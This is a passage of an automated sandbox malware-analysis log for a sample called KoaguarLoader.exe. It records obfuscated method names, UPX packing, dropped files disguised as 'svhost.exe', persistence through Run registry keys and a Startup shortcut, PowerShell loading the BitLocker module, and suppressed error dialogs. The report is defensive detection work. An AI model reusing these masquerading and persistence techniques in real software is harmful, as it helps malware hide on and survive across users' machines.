                        Source: 3.2.svhost.exe.31e05f0.0.raw.unpack, mz0y4kDiZLBo1CD8kctviln15Mlav4wWqkiophhSIbAY36tFYR0bzy8aUlhtkDGzMWh01GiNohDriTCeHcUR7oD895.csHigh entropy of concatenated method names: 'HQ4SmufoVeTWvZHMPWE38mJowv0ZqhbBlrHxpGKre8MaENZhXGPam4eUnAeh6qTIBsQvF8YXFwVKjbOJqfuStF4j3D', 'whVwF84cdhqhBlK13F', 'm3GXfGHyogcdXOobmt', 'EK9XryzRcF6AbqBZyj', '_0JFxjjsypx5pg0r4LV'
                        Source: 3.2.svhost.exe.31e05f0.0.raw.unpack, HinmvclvjMV04j4LsLs1R5hhpSJTYBZXnfPuNv9c1JrEyOq6sBV7oTZLjwr6e3IVUwGiigOYcN1IBjL3qkE4kJlIBN.csHigh entropy of concatenated method names: 'TvTk9crAf1vPq1l7tQNMAajN5dO0BIlajnUfjWF1DTfGzmKVVDDW5UCVsc6RbnHgFe0iTKM23LIT7YrIvJGJXjw8fx', '_3WyUne7TIopD6ctftiAb0vgov9HIVn28hXSFdP20sdCpetye5cBMasORZyxCL0rPac8gwCj4wOcQr6OFRWPQIoBpVy', '_4NZOm9t2GJDzuWgo6xRGWdGRCZPx4sw3xsdWbBBEoXF3sRhNLJDMr3j95ioDf4N94fY9fgRv1jhU9opxdZrvA6SJ2Z', '_9qnsjnbHjKKlcUXfAmx6duO7YflZEhnW7at5574mDd3EaQWlechuF1Zhib2dFBnN21fPkclHWtlPfbJWLp1sVKMyrM', 'u6NcUUD2Va1J0dw4jw', 'XOFS6ORvGscpqc8H7d', '_5E61Grpyt0KrY78W70', 'fnmyZe45FG1ll8J6cS', 'GbnyL2c95RcwyGfI3Z', 'Uj9Jfu4uXIR6ZbaK5l'
                        Source: initial sampleStatic PE information: section name: UPX0
                        Source: initial sampleStatic PE information: section name: UPX1
                        Source: initial sampleStatic PE information: section name: UPX0
                        Source: initial sampleStatic PE information: section name: UPX1
                        Source: initial sampleStatic PE information: section name: UPX0
                        Source: initial sampleStatic PE information: section name: UPX1
                        Source: C:\Users\user\Desktop\KoaguarLoader.exeFile created: C:\Users\user\AppData\Local\Temp\svhost.exeJump to dropped file
                        Source: C:\Users\user\Desktop\KoaguarLoader.exeFile created: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exeFile created: C:\Users\user\AppData\Local\Comms\HkqNfKUrMBAD.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeFile created: C:\Users\user\AppData\Roaming\svhost.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exeFile created: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeJump to dropped file

                        Boot Survival

                        barindex
                        Creates multiple autostart registry keys
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run svhostJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run HkqNfKUrMBADJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run I1y524I4zau1n3uJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svhost.lnkJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svhost.lnkJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run HkqNfKUrMBADJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run HkqNfKUrMBADJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run I1y524I4zau1n3uJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run I1y524I4zau1n3uJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run svhostJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run svhostJump to behavior

                        Hooking and other Techniques for Hiding and Protection

                        barindex
                        Loading BitLocker PowerShell Module
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Users\user\Desktop\KoaguarLoader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Comms\HkqNfKUrMBAD.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
